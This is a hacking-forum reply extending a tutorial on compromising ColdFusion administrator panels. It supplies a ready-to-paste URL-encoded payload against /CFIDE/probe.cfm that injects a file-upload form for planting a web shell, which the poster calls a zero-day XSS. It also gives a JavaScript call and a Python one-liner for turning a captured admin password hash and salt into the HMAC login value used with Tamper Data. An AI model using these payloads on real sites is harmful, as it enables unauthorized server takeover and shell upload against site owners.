[Charon]

Nice tutorial Cyber, although this is only 1 method on how to do it.

There's also another method for example if failed to upload your shell it could be that /CFIDE is not writeable. But then it might be possible to subvert the outgoing firewall by exploiting a localhost XSS in probe.cfm

To do to this add this to your URL:

Code:

www.site.com/CFIDE/probe.cfm?name=%3Cb%3E%26%23181%3BSH%3C%2Fb%3E%22%3C%2Fh1%3E%3Ccfif%20isDefined(%22Form.File%22)%3E%3Ccftry%3E%3Ccffile%20action%3D%22upload%22%20destination%3D%22%23Expandpath(%22.%22)%23%22%20filefield%3D%22Form.File%22%20nameconflict%3D%22overwrite%22%3EFile%20uploaded!%3Ccfcatch%3EUpload%20failed%3C%2Fcfcatch%3E%3C%2Fcftry%3E%3C%2Fcfif%3E%3Cform%20method%3DPOST%20enctype%3D%22multipart%2Fform-data%22%3E%3Cinput%20type%3Dfile%20name%3D%22File%22%3E%3Cinput%20type%3Dsubmit%20value%3D%22Upload%22%3E%3C%2Fform%3E%3Cscript%3E

It exploits a zero day XSS attack in probe.cfm

Also if the javascript:

Code:

jalert(hex_hmac_sha1(document.loginform.salt.value,document.loginform.cfadminPass​word.value))

doesn't work you can also use a python one-liner.

Here it is:

Code:

python -c 'import hashlib,hmac; hash=raw_input("Hash > "); salt=raw_input("Salt > "); print "HMAC",hmac.new(salt,hash,hashlib.sha1).hexdigest().upper()'

To see the hash view the source and CTRL+F 'salt' and paste it in there, you should get the password in HMAC form and as you've said in your tutorial do that with Tamper Data.

Even though, it's still a good tutorial for the begginers.